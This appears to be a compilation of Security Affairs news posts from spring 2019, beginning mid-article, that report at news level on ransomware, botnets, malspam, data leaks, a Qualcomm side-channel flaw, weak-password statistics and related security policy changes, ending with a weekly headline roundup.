Crooks used PowerShell commands to download and execute malicious payloads, they demanded a ransom that ranges from $1,500 worth of BitCoin up to $2,500. The ransom doubles if the victims do not pay it within a specified number of days.

Talos started seeing the first stages of the Sodinokibi attacks — the attackers first looked for exploitable WebLogic servers —

Since April 25, one day before Oracle released security patches, the experts started observing Sodinokibi ranomware infections.

Talos also noted that threat actors were exploiting the flaw to deliver the popular Gandcrab ransomware.

“We find it strange the attackers would choose to distribute additional, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab,” continues Talos researchers.

Experts discovered that the CVE-2019-2725 has been also exploited to deliver cryptocurrency miners and other types of malware. Researchers believe it has also likely been exploited in targeted attacks.

“Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725 ” concludes Talos.

Pierluigi Paganini

(SecurityAffairs – sodinokibiransomware, Weblogic)

The post Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware appeared first on Security Affairs.

Vodafone discovered backdoors in Huawei equipment. But it was 2011 ..

Huawei made the headlines again, Vodafone identified backdoors in software that could have handed Huawei unauthorized access to the carrier’s fixed-line network.

According to Bloomberg, Vodafone identified hidden backdoors in software that could have handed Huawei unauthorized access to the carrier’s fixed-line network in Italy used to connect to the internet.

“Now Vodafone Group Plc has acknowledged to Bloomberg that it found vulnerabilities going back years with equipment supplied by Shenzhen-based Huawei for the carrier’s Italian business.” reads the blog post published by Bloomberg. “While Vodafone says the issues were resolved, the revelation may further damage the reputation of a major symbol of China’s global technology prowess.”

Wait a moment the flaws in the Huawei technology were discovered by Vodafone a decade ago.

Bloomberg obtained Vodafone’s security briefing documents from 2009 and 2011 and spoke with people involved in the situation. The version provided by AFP, is slightly different because even if Vodafone confirmed the presence of the flaws, it is not true that bugs could have allowed unauthorized access to Italy’s fixed-line network.

“Vodafone confirmed to AFP that the issues were resolved but stressed it was incorrect to suggest that the flaw could have allowed unauthorized access to Italy’s fixed-line network.” reported the AFP.

Bloomberg revealed that once discovered the backdoors in home routers in 2011, Vodafone asked Huawei to address them. The Chinese firm told the supplier that the issues were fixed, but according to Bloomberg further testing revealed that the vulnerabilities were not completely solved.

“Vodafone asked Huawei to remove backdoors in home internet routers in 2011 and received assurances from the supplier that the issues were fixed, but further testing revealed that the security vulnerabilities remained, the documents show.” continues bloomberg. “Vodafone also identified backdoors in parts of its fixed-access network known as optical service nodes, which are responsible for transporting internet traffic over optical fibers, and other parts called broadband network gateways, which handle subscriber authentication and access to the internet, the people said. “

Bloomberg refers to the backdoor as unauthorized Telnet access to the Huawei equipment.

“The ‘backdoor’ that Bloomberg refers to is Telnet, which is a protocol that is commonly used by many vendors in the industry for performing diagnostic functions. It would not have been accessible from the internet,” Vodafone said in an emailed statement.

“The issues were identified by independent security testing, initiated by Vodafone as part of our routine security measures, and fixed at the time by Huawei,” 

Huawei clarified that the flaws were discovered back in 2011 and 2012 and were quickly fixed.

“We were made aware of historical vulnerabilities in 2011 and 2012 and they were addressed at the time. Software vulnerabilities are an industry-wide challenge.” said Huawei.

Huawei explained it has “a well established public notification and patching process, and when a vulnerability is identified we work closely with our partners to take the appropriate corrective action”.

Huawei is in the middle of a heated debate, many governments, driven by the US, have banned the company from the building of 5G networks.

A few days ago, the British Government has approved a limited role for Huawei in the building of a national 5G network in the country, ignoring security concerns from senior ministers.

Britain’s National Security Council approved a limited role for Huawei to help build a “non-core” infrastructure such as antennas,” Media reports said Prime Minister Theresa May had conditionally allowed Huawei to build the UK 5G network.

According to Bloomberg, Vodafone chief executive Nick Read “has joined peers in publicly opposing any bans on Huawei from 5G rollouts, warning of higher costs and delays”.

Anyway we have to consider that it is not difficult to find vulnerabilities in network equipment of almost any vendor, in many cases the flaws remained unfixed for a long time.

The cases reported by Bloomberg are dated back 2011 and 2012, and the unique aspect of the story to check is if Huawei has addressed the flaw just after Vodafone reported them to the Chinese vendor.

Pierluigi Paganini

(SecurityAffairs – China, Vodafone)

The post Vodafone discovered backdoors in Huawei equipment. But it was 2011 .. appeared first on Security Affairs.

Norsk Hydro estimates March cyber attack cost at $50 Million

Aluminum producer Norsk Hydro estimated the cost of the massive attack cyber attack targeting the company in March at around $50 million.

How much cost a security breach? I can tell you that potential damages could be very expensive for companies, for example, the transportation giant Maersk announced in 2017 that it would incur hundreds of millions in U.S. Dollar losses due to the NotPetya ransomware massive attack.

Back to nowadays, in mid-March Global aluminum producer Norsk Hydro was hit by a “massive” cyber attack that impacted operations in several of the company’s business areas across Europe and the U.S.

The news of the cyber attack had an immediate economic impact and caused a drop in the share price of 2.0 percent in early trading on the Oslo Stock Exchange. In just one week after the ransomware attack, the company declared it had more than $40 million losses.

The company postponed the publication of the quarterly earnings to June 5 because of the cyber attack.

Norsk Hydro

According to Norsk Hydro, the overall financial impact of the massive attack would be 400-450 million Norwegian krona ($46-$52 million, 41-46 million euros..

“The cyber attack that hit us on March 19 has affected our entire global organization, with Extruded Solutions having suffered the most significant operational challenges and financial losses,” says President and CEO Svein Richard Brandtzæg- He also added that the overall financial impact of the cyber attack is estimated at NOK 400-450 million in the first quarter.

The good news for the investors is that the company has a robust cyber insurance in place with recognized insurers.

The company did not pay any ransom and has filed a complaint with Norwegian police that is investigating the incident.

“The company’s shares dropped 1.65 percent in morning trading on the Oslo Stock Exchange.” states the AFP press.

Pierluigi Paganini

(SecurityAffairs – Norsk Hydro, ransomare)

The post Norsk Hydro estimates March cyber attack cost at $50 Million appeared first on Security Affairs.

Saint Ambrose Catholic Parish – Crooks stole $1.75M in BEC Attack

Crooks have stolen $1.75 million in a church BEC (Business Email Compromise) attack, the victim is the Saint Ambrose Catholic Parish.

Cybercriminals have stolen $1.75 million in a BEC (Business Email Compromise) attack against the Saint Ambrose Catholic Parish.

Saint Ambrose is the second largest church in the Diocese of Cleveland and the largest church in Brunswick, Ohio.

The Saint Ambrose Catholic Parish discovered the BEC attack on April 17 when was making payments related to a Vision 2020 project that were never received by a contractor (Marous Brothers Construction).

According to the investigation conducted by the FBI and Brunswick police, hackers broke into the parish’s email system, likely via a phishing attack. Attackers were able to trick the personnel into believing that the contractor had changed their bank, and asked them to transfer the funds to a new bank account under their control.

BEC

In a letter to the parish, Fr. Bob Stec explained he was contacted by the contractor that informed him that he did receive the payments for the past two months.

“On Wednesday, Marous Brothers called inquiring as to why we had not paid our monthly payment on the project for the past two months totaling approximately $1,750,000.” reads a letter sent to parish by Pastor Father Bob Stec.

“This was shocking news to us, as we have been very prompt on our payments every month and have received all the appropriate confirmations from the bank that the wire transfers of money to Marous were executed/confirmed.”

According to Stec, crooks accessed two St. Ambrose employees’ email accounts. Attackers only compromised the email system, they did not access to the parish database that is stored in a secure cloud-based system.

“We are working closely with the Diocese and its insurance program to file a claim in the hopes that Marous Brothers Construction can receive their payment quickly and we can bring this important project for our parish to a positive completion,” Stec said in the letter.

The parish submitted an insurance claim in the attempt of recovering the stolen money.

“At the same time, we brought in information technology consultants to review the security and stability of our system, change all passwords, and verify the integrity of our databases and other pertinent information.” Stec added. “They have determined the breach was limited to only two email accounts.”

BEC attacks represent a serious threat for businesses, according to the recently released 2018 Internet Crime Report by FBI’s Internet Crime Complaint Center (IC3), BEC scams reached $1,2 billion in profits.

“In 2018, the IC3 received 20,373 BEC/E-mail Account Compromise (EAC) complaints with adjusted losses of over $1.2 billion” reads the report.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Saint Ambrose Catholic Parish – Crooks stole $1.75M in BEC Attack appeared first on Security Affairs.

Facebook funds research on the impact of social media on elections

Facebook is going to fund academic research on the impact of social media on elections, aimed at preventing manipulation of these platforms.

Facebook is committed to preventing manipulation of elections through social media by funding research on the impact of social media on elections.

Facebook announced the involvement of 60 researchers from 30 academic institutions across 11 countries that were selected by the Social Science Research Council and the independent group Social Science One.

The research began in 2018 following revelations of influence on the 2016 US election and the Brexit vote, and this week the social network giant revealed its first grants.

“We hope this initiative will deepen public understanding of the role social media has on elections and democracy and help Facebook and other companies improve their products and practices.” reads a blog post by Facebook executives Elliot Schrage and Chaya Nayak. “This initiative will deepen our work with universities around the world as we continue to improve our ability to address current threats and anticipate new ones.”

Over the past months, Facebook has begun building a data sharing infrastructure to provide researchers access to Facebook data in a secure way and preserving the users’ privacy.

Facebook is also testing the application of differential privacy that adds statistical noise to raw data sets to prevent the identification of an individual. The social media platform also limits the number of queries a researcher can run to prevent circumventing of privacy measures.

“The urgency of this research cannot be overstated,” Social Science One wrote in a press release. “Concerns about disinformation, polarization, political advertising, and the role of platforms in the information ecosystem have not diminished. If anything, they have heightened.”

Pierluigi Paganini

(SecurityAffairs – Facebook, elections)

The post Facebook funds research on the impact of social media on elections appeared first on Security Affairs.

ElectrumDoSMiner botnet reached 152,000 hosts

Researchers at Malwarebytes are monitoring the evolution of the ElectrumDoSMiner DDoS botnet that reached 152,000 infected hosts.

MalwareBytes researchers are closely monitoring attacks against users of the popular Electrum Bitcoin wallet, in particular, the evolution of the Electrum DDoS botnet.

In mid-April, experts at MalwareBytes published a report warning of cyber attacks against users of the popular Electrum Bitcoin wallet. According to the experts, crooks already netted over 771 Bitcoins, an amount equivalent to approximately $4 million USD at current exchange rates.

Since that analysis, cyber criminals have stolen other funds reaching USD $4.6 million, but the most concerning aspect of the story is that and the botnet they used continues to grow. On April 24, the botnet was composed of less than 100,000 bots, but the next day the number peaked at 152,000.

“Since our last blog, the amount of stolen funds has increased to USD $4.6 million, and the botnet that is flooding the Electrum infrastructure is rapidly growing.” reads the analysis published by MalwareBytes. “Case in point, on April 24, the number of infected machines in the botnet was just below 100,000 and the next day it reached its highest at 152,000, according to this online tracker. Since then, it has gone up and down and plateaued at around the 100,000 mark.”

The experts already monitored two malware campaigns respectively leveraging the RIG exploit kit and the Smoke Loader to deliver the ElectrumDoSMiner.

MalwareBytes also detected a previously undocumented tracked as Trojan.BeamWinHTTP that was used by crooks to deliver the ElectrumDoSMiner (transactionservices.exe).

The experts believe that there are many more infection vectors beyond the above loaders they discovered.

Most of the ElectrumDoSMiner infections were observed in Asia Pacific region (APAC), Brazil and Peru.

ElectrumDoSMiner

“The number of victims that are part of this botnet is constantly changing. We believe as some machines get cleaned up, new ones are getting infected and joining the others to perform DoS attacks.” continues the report. “Malwarebytes detects and removes ElectrumDoSMiner infections on more than 2,000 endpoints daily.”

Further technical details, including Indicators of Compromise (IoCs), are reported in the analysis published by MalwareBytes.

Pierluigi Paganini

(SecurityAffairs – ElectrumDoSMiner, botnet)

The post ElectrumDoSMiner botnet reached 152,000 hosts appeared first on Security Affairs.

United Airlines covers up seat cameras to respond to privacy concerns

United Airlines opted to cover every camera in entertainment systems embedded within the back of plane seats in response to privacy concerns.

Flying on United Airlines planes it is possible to find cameras included in screen and entertainment products used by the airline and mounted in the back of the seats.

“A viral photo showing a camera in a Singapore Airlines in-flight TV display recently caused an uproar online.” reported BuzzFeed. “The image was retweeted hundreds of times, with many people expressing concern about the privacy implications. As it turns out, some seat-back screens in American Airlines’ premium economy class have them, too.”

In response to user privacy concerns, the airline decided to cover every camera in entertainment systems, but pointed out that their purpose was not the surveillance of the passengers.

A company spokesman announced that the cameras will now be covered.

The company explained that the presence of the cameras could open for future applications for business and entertainment (i.e. gaming, video conferencing).

“As with many other airlines, some of our premium seats have in-flight entertainment systems that came with cameras installed by the manufacturer.” reads a United Airlines spokesperson’ statement. “None of these cameras were ever activated and we had no plans to use them in the future, however we took the additional step to cover the cameras. The cameras are a standard feature that manufacturers of the system included for possible future purposes such as video conferencing.” 

The company is using stickers to cover these cameras, even for all new premium seats.

Recently also Singapore Airlines was criticized for the usage of cameras under the screen with the seats pointing to the passengers.

United Airlines 2

“These cameras on our newer IFE systems were provided by the original equipment manufacturers,” Singapore Airlines replied. “We have no plans to enable or develop any features using the cameras.”

Passengers and experts fear that facial recognition technology will be widely adopted in commercial aviation, for example, to monitor individuals during the boarding.

Pierluigi Paganini

(SecurityAffairs – United Airlines, privacy)

The post United Airlines covers up seat cameras to respond to privacy concerns appeared first on Security Affairs.

New Emotet variant uses connected devices as proxy C2 servers

Researchers at Trend Micro have uncovered a malware campaign distributing a new Emotet Trojan variant that compromises devices and uses them as Proxy C2 servers.

Trend Micro discovered a new variant of the Emotet Trojan that is able to infect devices and use them as proxy command-and-control servers. The new variant also employs random URI directory paths to evade network-based detection rules.

“Recently, an analysis of Emotet traffic has revealed that new samples use a different POST-infection traffic than previous versions. ” reads the analysis published by Trend Micro. “It is also attempting to use compromised connected devices as proxy command and control (C&C) servers that redirect to the real Emotet C&Cs. These changes may seem trivial at first, but the added complexity in command and control traffic is an attempt by Emotet authors to evade detection. “

The experts also noticed that threat actors behind the latest Emotet campaign are actively attempting to compromise IoT devices, including routers, IP cameras, webcams, and recruit them in a first layer of the C2 infrastructure.

The compromised devices could be used by threat actors for other malicious purposes.

Emotet is delivered via spam campaigns, one of the attacks monitored in early April leveraged the Powload trojan downloader to drop the threat. The spam emails use malicious ZIP file that can be opened with the 4-digit password included in the body of the email. The ZIP archive contains variants of Powload that uses Powershell to download an executable the final Emotet payload.

Emotet 1

Since March 15, experts monitored Emotet samples using new POST-infection traffic and discovered they were also using randomly generated URI directory paths in its POST requests to evade network-based detection

The new Emotet version sends the stolen info within the HTTP POST message body, instead of using the Cookie header. Like previous versions, it encrypts data with an RSA key and AES, and encoded it in Base 64.

Emotet traffic

“The change in POST-infection traffic and the use of these connected devices show that Emotet is still a constantly evolving and resilient threat.” concludes Trend Micro.

“The malware authors are fine-tuning evasion techniques and trying to adapt to security solutions. If left unchecked and undetected, this threat may lead to a substantial loss of money and data for businesses.”

Pierluigi Paganini

(SecurityAffairs – cybercrime, malware)

The post New Emotet variant uses connected devices as proxy C2 servers appeared first on Security Affairs.

Report: Unknown Data Breach Exposes 80 Million US Households

vpnMentor’s research team discovered a hack affecting 80 million US households, and the incident is still actively leaking data. 

Known hacktivists Noam Rotem and Ran Locar discovered an unprotected database impacting up to 65% of US households.

Hosted by a Microsoft cloud server, the 24 GB database includes the number of people living in each household with their full names, their marital status, income bracket, age, and more.

Information Included in the Database

Below is a screenshot of a typical entry from this database:

The database seems to itemize households rather than individuals. It includes:

  • Full addresses, including street addresses, cities, counties, states, and zip codes
  • Exact longitude and latitude
  • Full names, including first, last, and middle initial
  • Age
  • Date of birth

Some information is included but coded (given what we assume to be an internally-assigned numerical value). This includes:

  • Title
  • Gender
  • Marital status
  • Income
  • Homeowner status
  • Dwelling type

The only real hint that this database belongs to some kind of service is that “member_code” and “score” each appear in every entry.

The Danger of Exposing this Information

This isn’t the first time a huge database has been breached. However, we believe that it is the first time a breach of this size has included peoples’ names, addresses, and income.

This open database is a goldmine for identity thieves and other attackers. Here’s how:

Cyber Attacks

Access to your full name can help hackers guess your email address. Many people use name.familyname@gmail.com as their email address. While this makes sense, it also makes you easy to identify.  

Phishing scams can take many forms, and ransomware is one of the most dangerous. Commonly, this happens when dangerous links are embedded in emails; opening them infects your computer. The only way to remove ransomware is by paying a fee – and with access to your income information, attackers know how much they can demand of you.

Real World Dangers

Your name and city are enough to run a comprehensive internet search. Google will bring up links to anything with your name, including: company websites, personal blogs or websites, social media profiles like Facebook, Instagram, and Twitter, and local media you may be featured in.

Let’s assume you haven’t updated the security settings on your Facebook profile for a while, so your posts are visible to people you’re not friends with. Everything you post is open to the internet – including the vacation photos you uploaded that morning. The geotag shows that you’re thousands of miles away from home.

Since your full address is in the database too, the thief not only knows where you live, they also now know that you’re far away from home so the house is probably empty. They can also see your income, so can approximate the value of your home contents. You just became a prime target for attack.

It gets worse: your age is in the database too. Attackers – both on and offline – can identify the most vulnerable people, filter them by income, and use the information in the database to confidently attack and exploit people by phone, email, or in person.

This scenario is just the tip of the iceberg. Addresses can easily lead to phone numbers, making people easy targets for phishing scams. Dates of birth and postal codes are common answers to security questions. And longitude and latitude mean your home can be pinpointed and watched.

Of course, there are ways to stay safe online and in the real world. For example, secure your home with alarms, and your internet connection with a top-rated VPN. This will help keep you safe, wherever you are.

How We Discovered the Leak

The research team is currently undertaking a huge web mapping project. They use port scanning to examine known IP blocks. This reveals open holes in web systems, which they then examine for weaknesses and data leaks.

Usually, researchers suspect where the leak is coming from. They can then examine the database to confirm its identity.

We then reach out to the database’s owner to report the leak, and where possible, alert the people affected. This helps build a safer and more protected internet.

Although we investigated the database online, we didn’t download it. Our researchers felt that downloading it would be an ethical breach, as they would then illegally own personally identifiable data sets without peoples’ consent.

Why This Data Breach is Different

This time, it’s different. The database that the team discovered includes identifying information for more than 80 million households across the United States. As most households include more than one resident, the database could directly impact hundreds of millions of individuals.

vpnMentor is calling on the public to help identify the database and close the leak.

Unlike previous leaks we’ve discovered, this time, we have no idea who this database belongs to. It’s hosted on a cloud server, which means the IP address associated with it is not necessarily connected to its owner.

The data includes uniform entries for more than 80 million households, making it almost impossible to narrow down. The only clue we found lay in people’s ages: despite searching thousands of entries, we could not find anyone listed under the age of 40.

Interestingly, a value for people’s income is given (however, we don’t know if it’s a code for an internal ranking system, a tax bracket, or an actual amount).

This made us suspect that the database is owned by an insurance, healthcare, or mortgage company. However, information one may expect to find in a database owned by brokers or banks is missing. For example, there are no policy or account numbers, social security numbers, or payment types.

Help Us Identify this Database

We want to contact this database’s owners and let them know that their data logs are exposing millions of households.

Help us solve the riddle:

What service is used by 80 million homes across the US – but only the US – and only by people over 40? What service would collect your homeowner status and dwelling type but not your social security number? And what service records that you’re married but not how many children you have?

If you can help us identify this database or know who owns it, please contact us at info@vpnmentor.com. The 80 million families listed here deserve privacy, and we need your help to protect it.

You May be Interested in Our Past Reports:

We recently revealed that Gearbest experienced a massive data breach, and that more than 25% of Fortune 500 companies have been hacked. You may also want to read our report of fake apps used in Iran to monitor users, VPN Leak Report and Data Privacy Stats Report.

Please share this report on Facebook or tweet it so other security professionals can help us identify and resolve this leak.

About the author: VPNmentor

The original report is available on the VPNmentor website:
https://www.vpnmentor.com/blog/report-millions-homes-exposed/

Pierluigi Paganini

(SecurityAffairs – US Households, Data leak)

The post Report: Unknown Data Breach Exposes 80 Million US Households appeared first on Security Affairs.

Over 23 million breached accounts were using ‘123456’ as password

A cyber survey conducted by the United Kingdom’s National Cyber Security Centre (NCSC) revealed that ‘123456’ is still the most hacked password.

Security experts at the United Kingdom’s National Cyber Security Centre (NCSC) analyzed the 100,000 most-commonly re-occurring breached passwords using data from Have I Been Pwned (HIBP).

Have I Been Pwned allows users to search across multiple data breaches to see if their email address has been compromised.

The NCSC discovered that 23.2 million user accounts worldwide were using ‘123456’ as password, while 7.7 million users were using ‘123456789’.

This data is disconcerting and shows that we are far from to be secure even if security experts continue to warn users of cyber risks associated with the use of weak passwords.

Of course. the list of most-hacked passwords also includes other simple items like ‘qwerty’, ‘password’ and ‘1111111,’ in top five, a gift for the hackers.

The list of top breached passwords includes names, musicians, football team names, and fictional characters.

“The NCSC has also today published separate analysis of the 100,000 most commonly re-occurring passwords that have been accessed by third parties in global cyber breaches.” reads the post published by the NCSC.

“The results show a huge number of regularly used passwordsbreached to access sensitive information.”

top breached passwords

Data reported by NCSC are aligned with findings from other similar studies conducted by security firm. In December, SplashData published for the 8th year in a row the worst passwords list, the annual report based on the analysis of more than 5 million leaked passwords. Below the 2018 top 10 most used passwords published by SplashData:

  1. 123456
  2. password 
  3. 123456789
  4. 12345678
  5. 12345
  6. 111111
  7. 1234567 
  8. sunshine
  9. qwerty
  10. iloveyou

Experts suggest the adoption of strong passwords and the usage of a unique password for every service they access. Passwords should contain at least 8 characters, upper and lower case letters, numbers, and symbols (i.e. %$#!.). Another good practice is the set up of multi-factor authentication wherever possible.

Below the key findings emerged from the survey:

  • Only 15% say they know a great deal about how to protect themselves from harmful activity
  • The most regular concern is money being stolen – with 42% feeling it likely to happen by 2021
  • 89% use the internet to make online purchases – with 39% on a weekly basis 
  • One in three rely to some extent on friends and family for help on cyber security
  • Young people more likely to be privacy conscious and careful of what details they share online
  • 61% of internet users check social media daily, but 21% report they never look at social media
  • 70% always use PINs and passwords for smart phones and tablets
  • Less than half do not always use a strong, separate password for their main email account

“We understand that cyber security can feel daunting to a lot of people, but the NCSC has published lots of easily applicable advice to make you much less vulnerable.” said Dr Ian Levy, NCSC Technical Director.

“Password re-use is a major risk that can be avoided – nobody should protect sensitive data with somethisng that can be guessed, like their first name, local football team or favourite band.”

“Using hard-to-guess passwords is a strong first step and we recommend combining three random but memorable words. Be creative and use words memorable to you, so people can’t guess your password.”

Pierluigi Paganini

(SecurityAffairs – Top breached passwords, hacking)

The post Over 23 million breached accounts were using ‘123456’ as password appeared first on Security Affairs.

Amnesty International Hong Kong Office hit by state-sponsored attack

The Hong Kong office of Amnesty International has been hit by a long-running cyberattack carried out by China-linked hackers.

Amnesty International’s Hong Kong office has been hit with a cyberattack launched by China-linked hackers.

“This sophisticated cyber-attack underscores the dangers posed by state-sponsored hacking and the need to be ever vigilant to the risk of such attacks. We refuse to be intimidated by this outrageous attempt to harvest information and obstruct our human rights work,” said Man-kei Tam, Director of Amnesty International Hong Kong.

An Amnesty International’s spokesperson told the South China Morning Post that supporters’ names, Hong Kong identity card numbers and personal contact information were accessed by the hackers, no financial data was compromised.

In response to the cyber attack, the organization set up a “global task force composed of cyber security professionals. 

The organizations discovered the security breach on March 15 during a scheduled migration of the Hong Kong office IT infrastructure to its international network.

“The initial findings reveal the attacks were perpetrated using tools and techniques associated with specific advanced persistent threat groups (APTs).” reads the announcement published by Amnesty International. “Cyber forensic experts were able to establish links between the infrastructure used in this attack and previously reported APT campaigns associated with the Chinese government.”

amnesty international

The organization has notified of the incident to all people that might have been impacted by the attack, it is also providing additional guidance to further ensure their data is secure. Amnesty also reported the attack to the Hong Kong’s Office of the Privacy Commissioner for Personal Data.

According to Amnesty International, Chinese authorities are hindering cooperation between international and domestic NGOs,

The group attributed the attack to “a known APT group” that used “tactics, techniques and procedures consistent with a well developed adversary”.

“This sophisticated cyberattack underscores the dangers posed by state-sponsored hacking and the need to be ever vigilant to the risk of such attacks,” said Man-kei Tam, Director of Amnesty International Hong Kong.

“We refuse to be intimidated by this outrageous attempt to harvest information and obstruct our human rights work,” he said.

The investigation is still ongoing to determine the extent of the hack and the time window of exposure, but experts fear the attack has been happening already for a few years.

Amnesty is a privileged target for state-sponsored hackers because of its activity with other NGOs, journalists, activists, and civil rights movements worldwide. 

In August 2018, Amnesty International revealed that one of its employees was targeted with a surveillance malware developed by an Israeli firm.

The human rights group published a report that provides details on the attack against its employee. 

Pierluigi Paganini

(SecurityAffairs – APT, Amnesty International)

The post Amnesty International Hong Kong Office hit by state-sponsored attack appeared first on Security Affairs.

Microsoft removes Password-Expiration Policy in security baseline for Windows 10

Microsoft presented a series of security enhancements for its Windows 10, including the removal of the password-expiration policy. 

Microsoft announced the removal of the password-expiration policy from its operating system starting with the next Windows 10 feature update (Windows 10 version 1903, a.k.a., “19H1” ) and Windows Server version 1903.

The idea behind this change is that a password-expiration policy could improve the user’s security only in case of a data breach, instead if a password is never compromised, setting an expiration date for it may worsen the user experience.

“Periodic password expiration is a defense only against the probability that a password (or hash) will be stolen during its validity interval and will be used by an unauthorized entity. If a password is never stolen, there’s no need to expire it.” reads the post published by Microsoft. “And if you have evidence that a password has been stolen, you would presumably act immediately rather than wait for expiration to fix the problem.”

An organization can protect users against stolen passwords by choosing alternative security policies instead of a password-expiration policy, for example by enforcing multi-factor authentication.

“Periodic password expiration is an ancient and obsolete mitigation of very low value, and we don’t believe it’s worthwhile for our baseline to enforce any specific value.” continues the post. “By removing it from our baseline rather than recommending a particular value or no expiration, organizations can choose whatever best suits their perceived needs without contradicting our guidance,”

The proposed Windows-10-1903-Security-Baseline-DRAFT also includes a change related to the built-in Administrator and Guest accounts that will not be disabled by default in the future.

Microsoft removes Password-Expiration Policy in security baseline for Windows 10

It also recommends to have administrative local accounts enabled by default, but only one of them should be in use and should have a strong password.

If you are interested in other changes proposed by Microsoft giver a look at the draft.

Pierluigi Paganini

(SecurityAffairs – Microsoft, password-expiration policy)

The post Microsoft removes Password-Expiration Policy in security baseline for Windows 10 appeared first on Security Affairs.

Critical flaw in Qualcomm chips exposes sensitive data for Android Devices

Researchers devised a new side-channel attack in Qualcomm technology, widely used by most Android smartphones, that could expose private keys.

Researchers have uncovered a new side-channel attack that could be exploited by attackers to extract sensitive data from Qualcomm secure keystore, including private keys, and passwords. The attack potentially impacts most of the modern Android devices that use Qualcomm chips,
including popular Snapdragon models 820, 835, 845 and 855

The attack leverages a flaw in the Qualcomm Secure Execution Environment (QSEE), designed to securely store cryptographic keys on devices.

“A side-channel attack can extract private keys from certain versions of Qualcomm’s secure keystore. Recent Android devices include a hardware-backed keystore, which developers can use to protect their cryptographic keys with secure hardware.” reads a blog post published by NCC Group. “On some devices, Qualcomm’s TrustZone-based keystore leaks sensitive information through the branch predictor and memory caches, enabling recovery of 224 and 256-bit ECDSA keys. “

Qualcomm

According to NCC, the Hardware-backed keystores rely on ARM TrustZone to protect sensitive data, it splits execution on many devices into a secure world (used to manage sensitive data) and a normal world (used by processes of the Android OS).

Experts pointed out that the two worlds have the same underlying microarchitectural structures, meaning an attacker could carry out a side-channel attack to access protected memory.

The experts used a memory cache analyzer called Cachegrab to carry out
side-channel attacks on TrustZone.

The experts tested a rooted Nexus 5X device using the Qualcomm Snapdragon 808 and discovered that the QSEE that leaking data that could be used to recover 256-bit ECDSA keys.

The attacker must have root access to the device to launch the attack.

Qualcomm has released a security patch to address the flaw tracked as CVE-2018-11976, while Android disclosed a patch for the flaw in its April update.

Below the timeline of the flaw:

  • March 19, 2018: Contact Qualcomm Product Security with issue; receive confirmation of receipt
  • April, 2018: Request update on analysis of issue
  • May, 2018: Qualcomm confirms the issue and begins working on a fix
  • July, 2018: Request update on the fix; Qualcomm responds that the fix is undergoing internal review
  • November, 2018: Request update on the timeline for disclosure; Qualcomm responds that customers have been notified in October, beginning a six-month carrier recertification process. Agree to April 2019 disclosure date.
  • March, 2019: Discuss publication plans for April 23
  • April, 2019: Share draft of paper with Qualcomm
  • April 23, 2019: Public Disclosure
  • Providing technologies that support robust security and privacy is a priority for Qualcomm,” a Qualcomm spokesperson told Threatpost. “We commend the NCC Group for using responsible disclosure practices surrounding their security research. Qualcomm Technologies issued fixes to OEMs late last year, and we encourage end users to update their devices as patches become available from OEMs.”

Technical details of the vulnerability are available in the paper published by the expert.

Pierluigi Paganini

(SecurityAffairs – Qualcomm, mobile)

The post Critical flaw in Qualcomm chips exposes sensitive data for Android Devices appeared first on Security Affairs.

Signed Malspam campaigns hit Europeans with Multi-Stage JasperLoader

Experts observed several malspam campaigns using signed emails to deliver the GootKit banking Trojan (aka talalpek or Xswkit).

Threat actors leverage a multi-stage malware loader tracked as JasperLoader in the malspam campaigns over the past few months.

The JasperLoader was observed while distributing malware to targets from Central Europe, most of them in Italy and Germany.

The Gootkit banking Trojan was previously distributed by DanaBotNeutrino exploit kit, and Emotet.

“Specifically, we’re tracking a loader known as “JasperLoader,” which has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries with a particular focus on Germany and Italy.” reads the analysis published by Cisco Talos. “JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult.”

The JasperLoader loader uses a multi-stage infection process that implements several obfuscation techniques to avoid detection. According to Cisco Talos experts, the JasperLoader loader was designed with resiliency and flexibility in mind.

The malspam campaigns detected by Cisco Talos that hit European countries use weaponized attachments containing either a Visual Basic for Applications (VBS) script or a DOCM documents with VBA macros.

malspam campaigns jasperloader

Talos experts also noticed spam messages containing malicious JS downloaders.

The latest malspam campaigns observed by Talos use message signing to confirm the authenticity of the sender.

Talos has identified several malicious campaigns making use of this type of message signing as a way to lend credibility to their messages and maximize the likelihood that potential victims will open the malicious attachments.” continues the analysis of the researchers.

The campaigns that targeted Italian users leverage legitimate certified email services such as Posta Elettronica Certificata (PEC).

“The choice to abuse certified email services such as PEC demonstrates that as attackers are always looking for new ways to lend credibility to their social engineering attacks.” continues Cisco Talos.

“In this case, abusing a legitimate email service allowed them to deliver their malicious emails in a way that would maximize the likelihood that a potential victim would open the attachments and infect themselves with JasperLoader. “

The JasperLoader malware loader is used by threat actors to check targets geolocation and determine if a machine is in one of the countries targeted in the malspam campaign (i.e. Russia, Ukraine, Belarus, or People’s Republic of China).

Experts observed that the malware gains persistence by adding an LNK shortcut to itself to the Startup folder, in this way every time the system is rebooted the malware will be launched.

The JasperLoader is used by threat actors to update the loader, to run Powershell scripts, and, of course, to deliver the final Gootkit malware payload.

Further technical details, such as Indicators of compromise (IOCs), are included in the analysis published by Talos.

Pierluigi Paganini

(SecurityAffairs – malspam campaigns, JasperLoader)

The post Signed Malspam campaigns hit Europeans with Multi-Stage JasperLoader appeared first on Security Affairs.

Security Affairs newsletter Round 211 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

60 Million records of LinkedIn users exposed online
INPIVX hidden service, a new way to organize ransomware attacks
Ride-Hailing Company operating in Iran exposes data of Iranian Drivers
A flaw in Shopify API flaw exposed revenue and traffic data of thousands of stores
Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT
jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites
Russian Twitter bot activity increased in the wake Mueller report release
Bodybuilding.com forces password reset after a security breach
EmCare reveals patient and employee data were hacked
FireEye experts found source code for CARBANAK malware on VirusTotal
Iran-linked APT34: Analyzing the webmask project
Targeted Attacks hit multiple embassies with Trojanized TeamViewer
Kaspersky speculates the involvement of ShadowPad attackers in Operation ShadowHammer
OilRig APT uses Karkoff malware along with DNSpionage in recent attacks
